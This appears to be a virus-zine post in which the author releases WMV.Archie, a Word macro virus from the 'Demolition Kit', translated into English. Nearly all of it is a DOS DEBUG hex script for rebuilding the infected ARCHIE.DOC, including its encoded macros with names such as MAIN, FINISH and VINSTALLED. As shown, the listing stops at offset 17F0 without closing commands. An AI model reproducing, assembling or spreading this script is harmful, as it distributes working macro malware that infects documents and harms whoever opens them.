					WMV.ARCHIE
					~~~~~~~~~~

I just got The Demolition Kit from the Nightmare Joker, and I noticed that all the code was
being generated in german, so I reworked one virus I made into English.  Here it is......

---------------------------------------_DEBUG SCRIPT_------------------------------------------
N ARCHIE.DOC
E 0100 D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 00 
E 0110 00 00 00 00 00 00 00 00 3E 00 03 00 FE FF 09 00 
E 0120 06 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 
E 0130 01 00 00 00 00 00 00 00 00 10 00 00 02 00 00 00 
E 0140 01 00 00 00 FE FF FF FF 00 00 00 00 00 00 00 00 
E 0150 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0160 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0170 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0180 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0190 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 01A0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 01B0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 01C0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 01D0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 01E0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 01F0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0200 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0210 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0220 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0230 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0240 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0250 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0260 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0270 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0280 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0290 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 02A0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 02B0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 02C0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 02D0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 02E0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 02F0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0300 FD FF FF FF 05 00 00 00 FE FF FF FF 04 00 00 00 
E 0310 06 00 00 00 FE FF FF FF 07 00 00 00 FE FF FF FF 
E 0320 09 00 00 00 0A 00 00 00 0B 00 00 00 0C 00 00 00 
E 0330 0D 00 00 00 0E 00 00 00 0F 00 00 00 10 00 00 00 
E 0340 11 00 00 00 FE FF FF FF FF FF FF FF FF FF FF FF 
E 0350 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0360 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0370 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0380 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0390 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 03A0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 03B0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 03C0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 03D0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 03E0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 03F0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0400 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0410 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0420 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0430 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0440 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0450 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0460 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0470 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0480 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0490 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 04A0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 04B0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 04C0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 04D0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 04E0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 04F0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0500 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 
E 0510 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0520 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0540 16 00 05 00 FF FF FF FF FF FF FF FF 03 00 00 00 
E 0550 00 09 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 
E 0560 00 00 00 00 00 00 00 00 00 00 00 00 A0 19 D7 18 
E 0570 E8 D9 BA 01 03 00 00 00 80 06 00 00 00 00 00 00 
E 0580 01 00 43 00 6F 00 6D 00 70 00 4F 00 62 00 6A 00 
E 0590 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 05A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 05B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 05C0 12 00 02 01 FF FF FF FF FF FF FF FF FF FF FF FF 
E 05D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 05E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 05F0 00 00 00 00 00 00 00 00 6E 00 00 00 00 00 00 00 
E 0600 57 00 6F 00 72 00 64 00 44 00 6F 00 63 00 75 00 
E 0610 6D 00 65 00 6E 00 74 00 00 00 00 00 00 00 00 00 
E 0620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0640 1A 00 02 01 FF FF FF FF 04 00 00 00 FF FF FF FF 
E 0650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0670 00 00 00 00 08 00 00 00 BE 12 00 00 00 00 00 00 
E 0680 4F 00 62 00 6A 00 65 00 63 00 74 00 50 00 6F 00 
E 0690 6F 00 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 06A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 06B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 06C0 16 00 01 01 01 00 00 00 02 00 00 00 FF FF FF FF 
E 06D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 06E0 00 00 00 00 E0 F1 CD 18 E8 D9 BA 01 E0 F1 CD 18 
E 06F0 E8 D9 BA 01 00 00 00 00 00 00 00 00 00 00 00 00 
E 0700 01 00 00 00 FE FF FF FF FF FF FF FF FF FF FF FF 
E 0710 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0720 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0730 FF FF FF FF FF FF FF FF FF FF FF FF 10 00 00 00 
E 0740 11 00 00 00 12 00 00 00 13 00 00 00 14 00 00 00 
E 0750 15 00 00 00 16 00 00 00 17 00 00 00 18 00 00 00 
E 0760 19 00 00 00 FE FF FF FF FF FF FF FF FF FF FF FF 
E 0770 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0780 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0790 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 07A0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 07B0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 07C0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 07D0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 07E0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 07F0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0800 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0810 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0820 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0830 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0840 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0850 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0860 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0870 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0880 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0890 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 08A0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 08B0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 08C0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 08D0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 08E0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 08F0 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
E 0900 01 00 FE FF 03 0A 00 00 FF FF FF FF 00 09 02 00 
E 0910 00 00 00 00 C0 00 00 00 00 00 00 46 1C 00 00 00 
E 0920 4D 69 63 72 6F 73 6F 66 74 20 57 6F 72 64 20 36 
E 0930 2E 30 20 44 6F 63 75 6D 65 6E 74 00 0A 00 00 00 
E 0940 4D 53 57 6F 72 64 44 6F 63 00 10 00 00 00 57 6F 
E 0950 72 64 2E 44 6F 63 75 6D 65 6E 74 2E 36 00 F4 39 
E 0960 B2 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0970 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0980 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0990 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 09A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 09B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 09C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 09D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 09E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 09F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0A00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0A10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0A20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0A30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0A40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0A50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0A60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0A70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0A80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0A90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0AA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0AB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0AC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0AD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0AE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0AF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0B00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0B10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0B20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0B30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0B40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0B50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0B60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0B70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0B80 9C 00 1A 02 02 01 02 00 00 00 EB 02 00 00 3A 00 
E 0B90 7A 00 00 00 00 00 64 00 00 00 00 00 00 00 00 00 
E 0BA0 57 00 00 00 00 00 00 00 44 00 00 00 00 00 3A 00 
E 0BB0 00 00 01 01 04 4D 41 49 4E 01 2A 00 08 00 00 00 
E 0BC0 00 00 00 00 2A 00 8C 00 00 00 00 00 00 01 07 46 
E 0BD0 49 4E 49 53 48 32 00 00 00 00 00 00 00 00 00 00 
E 0BE0 01 01 49 00 00 00 00 00 00 00 00 00 00 01 0A 56 
E 0BF0 49 4E 53 54 41 4C 4C 45 44 00 00 00 94 00 00 00 
E 0C00 00 00 00 01 06 46 49 4E 49 53 48 00 00 00 3A 00 
E 0C10 6D 01 00 00 00 00 3A 00 E9 02 00 00 01 00 09 02 
E 0C20 03 00 21 02 19 00 00 00 03 00 28 10 00 00 AC 87 
E 0C30 00 01 17 00 00 00 00 00 00 00 00 00 00 00 01 00 
E 0C40 27 02 03 00 66 02 19 00 05 00 01 00 08 00 00 00 
E 0C50 00 00 04 01 12 00 00 00 00 00 00 00 00 00 00 00 
E 0C60 01 00 6C 02 03 00 84 02 19 00 00 00 03 00 0F 01 
E 0C70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0C80 0D 06 00 A4 82 2E A5 C6 41 00 00 00 00 00 00 00 
E 0C90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0CA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0CB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0CC0 FE FF 00 00 03 5F 00 00 00 00 00 00 00 00 00 00 
E 0CD0 00 00 00 00 00 00 00 00 01 00 00 00 E0 85 9F F2 
E 0CE0 F9 4F 68 10 AB 91 08 00 2B 27 B3 D9 30 00 00 00 
E 0CF0 8C 02 00 00 0D 00 00 00 07 00 00 00 98 00 00 00 
E 0D00 05 00 53 00 75 00 6D 00 6D 00 61 00 72 00 79 00 
E 0D10 49 00 6E 00 66 00 6F 00 72 00 6D 00 61 00 74 00 
E 0D20 69 00 6F 00 6E 00 00 00 00 00 00 00 00 00 00 00 
E 0D30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0D40 28 00 02 00 FF FF FF FF FF FF FF FF FF FF FF FF 
E 0D50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0D60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0D70 00 00 00 00 0F 00 00 00 BC 02 00 00 00 00 00 00 
E 0D80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0D90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0DA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0DB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0DC0 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF 
E 0DD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0DE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0DF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0E00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0E10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0E20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0E30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0E40 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF 
E 0E50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0E60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0E70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0E80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0E90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0EA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0EB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0EC0 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF 
E 0ED0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0EE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0EF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0F00 04 00 00 00 DC 00 00 00 08 00 00 00 00 01 00 00 
E 0F10 0C 00 00 00 24 01 00 00 0B 00 00 00 48 01 00 00 
E 0F20 0D 00 00 00 6C 01 00 00 0F 00 00 00 90 01 00 00 
E 0F30 10 00 00 00 B4 01 00 00 0A 00 00 00 D8 01 00 00 
E 0F40 12 00 00 00 FC 01 00 00 0E 00 00 00 20 02 00 00 
E 0F50 09 00 00 00 44 02 00 00 13 00 00 00 68 02 00 00 
E 0F60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0F70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0F80 00 00 00 00 00 00 00 00 1E 00 00 00 28 00 00 00 
E 0F90 43 3A 5C 57 49 4E 41 50 50 53 5C 4D 53 4F 46 46 
E 0FA0 49 43 45 5C 57 49 4E 57 4F 52 44 36 5C 4E 4F 52 
E 0FB0 4D 41 4C 2E 44 4F 54 00 00 00 00 00 00 00 00 00 
E 0FC0 00 00 00 00 00 00 00 00 00 00 00 00 1E 00 00 00 
E 0FD0 0B 00 00 00 44 61 72 6B 20 4E 69 67 68 74 00 00 
E 0FE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0FF0 1E 00 00 00 0B 00 00 00 44 61 72 6B 20 4E 69 67 
E 1000 68 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1010 00 00 00 00 40 00 00 00 00 4C 20 58 F0 D9 BA 01 
E 1020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1030 00 00 00 00 00 00 00 00 40 00 00 00 00 C0 A4 59 
E 1040 8B B7 DE 01 00 00 00 00 00 00 00 00 00 00 00 00 
E 1050 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 
E 1060 00 4C 20 58 F0 D9 BA 01 00 00 00 00 00 00 00 00 
E 1070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1080 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 10A0 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 
E 10B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 10C0 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 
E 10D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 10E0 00 00 00 00 00 00 00 00 00 00 00 00 1E 00 00 00 
E 10F0 13 00 00 00 4D 69 63 72 6F 73 6F 66 74 20 57 6F 
E 1100 72 64 20 36 2E 30 00 00 00 00 00 00 00 00 00 00 
E 1110 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1130 00 00 00 00 1E 00 00 00 02 00 00 00 32 00 00 00 
E 1140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1150 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 
E 1160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 11A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 11B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 11C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 11D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 11E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 11F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 12A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 12B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 12C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 12D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 12E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 12F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1300 DC A5 65 00 2D C0 09 08 00 00 01 00 65 00 00 00 
E 1310 00 00 00 00 00 00 00 00 00 03 00 00 01 03 00 00 
E 1320 BE 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1330 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 
E 1340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1350 00 00 00 00 00 00 00 00 00 0E 00 00 6A 00 00 00 
E 1360 00 0E 00 00 6A 00 00 00 6A 0E 00 00 00 00 00 00 
E 1370 6A 0E 00 00 00 00 00 00 6A 0E 00 00 00 00 00 00 
E 1380 6A 0E 00 00 00 00 00 00 6A 0E 00 00 14 00 00 00 
E 1390 7E 0E 00 00 00 00 00 00 7E 0E 00 00 00 00 00 00 
E 13A0 7E 0E 00 00 00 00 00 00 7E 0E 00 00 00 00 00 00 
E 13B0 7E 0E 00 00 00 00 00 00 7E 0E 00 00 0A 00 00 00 
E 13C0 88 0E 00 00 0A 00 00 00 7E 0E 00 00 00 00 00 00 
E 13D0 11 12 00 00 31 00 00 00 92 0E 00 00 00 00 00 00 
E 13E0 92 0E 00 00 00 00 00 00 92 0E 00 00 00 00 00 00 
E 13F0 92 0E 00 00 00 00 00 00 92 0E 00 00 00 00 00 00 
E 1400 92 0E 00 00 00 00 00 00 92 0E 00 00 00 00 00 00 
E 1410 92 0E 00 00 00 00 00 00 DF 0E 00 00 F2 00 00 00 
E 1420 D1 0F 00 00 00 00 00 00 D1 0F 00 00 00 00 00 00 
E 1430 D1 0F 00 00 1E 00 00 00 EF 0F 00 00 02 01 00 00 
E 1440 F1 10 00 00 02 01 00 00 F3 11 00 00 1E 00 00 00 
E 1450 42 12 00 00 54 00 00 00 96 12 00 00 28 00 00 00 
E 1460 11 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1470 00 00 00 00 00 00 00 00 6A 0E 00 00 00 00 00 00 
E 1480 92 0E 00 00 00 00 00 00 00 00 05 00 06 00 01 00 
E 1490 01 00 92 0E 00 00 00 00 00 00 92 0E 00 00 00 00 
E 14A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 14B0 00 00 92 0E 00 00 00 00 00 00 92 0E 00 00 00 00 
E 14C0 00 00 11 12 00 00 00 00 00 00 92 0E 00 00 00 00 
E 14D0 00 00 6A 0E 00 00 00 00 00 00 6A 0E 00 00 00 00 
E 14E0 00 00 92 0E 00 00 00 00 00 00 00 00 00 00 00 00 
E 14F0 00 00 00 00 00 00 00 00 00 00 92 0E 00 00 00 00 
E 1500 00 00 92 0E 00 00 00 00 00 00 92 0E 00 00 00 00 
E 1510 00 00 92 0E 00 00 00 00 00 00 92 0E 00 00 00 00 
E 1520 00 00 6A 0E 00 00 00 00 00 00 92 0E 00 00 00 00 
E 1530 00 00 6A 0E 00 00 00 00 00 00 92 0E 00 00 00 00 
E 1540 00 00 DF 0E 00 00 00 00 00 00 00 00 00 00 00 00 
E 1550 00 00 00 00 00 00 00 00 00 00 7E 0E 00 00 00 00 
E 1560 00 00 7E 0E 00 00 00 00 00 00 6A 0E 00 00 00 00 
E 1570 00 00 6A 0E 00 00 00 00 00 00 6A 0E 00 00 00 00 
E 1580 00 00 6A 0E 00 00 00 00 00 00 92 0E 00 00 00 00 
E 1590 00 00 DF 0E 00 00 00 00 00 00 92 0E 00 00 4D 00 
E 15A0 00 00 92 0E 00 00 00 00 00 00 00 00 00 00 00 00 
E 15B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 15C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 15D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 15E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 15F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1600 0D 06 00 A4 82 2E A5 C6 41 01 00 64 1B 69 04 4D 
E 1610 41 49 4E 64 64 70 2F 20 41 20 56 69 72 75 73 20 
E 1620 66 72 6F 6D 20 4E 69 67 68 74 6D 61 72 65 20 4A 
E 1630 6F 6B 65 72 27 73 20 44 65 6D 6F 6C 69 74 69 6F 
E 1640 6E 20 4B 69 74 21 64 70 2C 20 54 72 61 6E 73 6C 
E 1650 61 74 65 64 20 69 6E 74 6F 20 45 6E 67 6C 69 73 
E 1660 68 20 62 79 20 44 61 72 6B 20 4E 69 67 68 74 20 
E 1670 28 56 42 42 29 64 64 1A 1B 8C 8D E9 96 E4 89 C0 
E 1680 CC C4 C3 E9 FD 98 AD C2 E3 AD C8 FF FF E2 FF AD 
E 1690 CA E2 F9 E2 AD CB E4 E3 E4 FE E5 E9 E9 AE E4 8C 
E 16A0 E4 81 E1 8C 8D A9 EA 3A 0D 88 E1 8C 8D 9F E1 8D 
E 16B0 8D 8B E9 DF 90 EA 35 0D 88 E4 8C E4 9F E1 8C 8D 
E 16C0 9F E1 8C 8D 8B 81 E7 8B CC FF EE E5 E4 E8 93 E9 
E 16D0 E2 8F E4 87 DB C4 E3 FE F9 EC E1 E1 E8 E9 81 E1 
E 16E0 8C 8D E9 DF 97 90 E9 AB E4 8C E4 E9 E9 90 E4 87 
E 16F0 DB C4 E3 FE F9 EC E1 E1 E8 E9 81 E1 8C 8D 93 E9 
E 1700 DF A7 E4 8B CB E4 E3 E4 FE E5 E9 AD E9 DF A1 A0 
E 1710 95 AB E9 DF EA D9 8D FE 46 8D 81 E1 8C 8D E9 DF 
E 1720 EA 4F 0D E7 82 CA E1 E2 EF EC E1 B7 CC F8 F9 E2 
E 1730 C2 FD E8 E3 9F EA A8 0D 88 8B 8A E7 84 B7 CC F8 
E 1740 F9 E2 C2 FD E8 E3 9F E1 8C 8D E9 DF EA 4F 0D E7 
E 1750 80 CA E1 E2 EF EC E1 B7 CC FF EE E5 E4 E8 9F EA 
E 1760 A8 0D 88 8B 8A E7 8A B7 CC FF EE E5 E4 E8 E9 DF 
E 1770 EA 4F 0D E7 82 CA E1 E2 EF EC E1 B7 CC F8 F9 E2 
E 1780 C8 F5 E8 EE 9F EA A8 0D 88 8B 8A E7 84 B7 CC F8 
E 1790 F9 E2 C8 F5 E8 EE 9F E1 8C 8D E9 DF EA 4F 0D E7 
E 17A0 83 CA E1 E2 EF EC E1 B7 CC F8 F9 E2 C3 E8 FA 9F 
E 17B0 EA A8 0D 88 8B 8A E7 85 B7 CC F8 F9 E2 C3 E8 FA 
E 17C0 9F E1 8C 8D E9 DF EA 4F 0D E7 9D CA E1 E2 EF EC 
E 17D0 E1 B7 CC F8 F9 E2 CE E1 E2 FE E8 9F EA A8 0D 88 
E 17E0 8B 8A E7 87 B7 CC F8 F9 E2 CE E1 E2 FE E8 9F E1 
E 17F0 8C 8D E9 DF EA 2E 0D E1 8C 8D 9F E1 8D 8D E9 97 
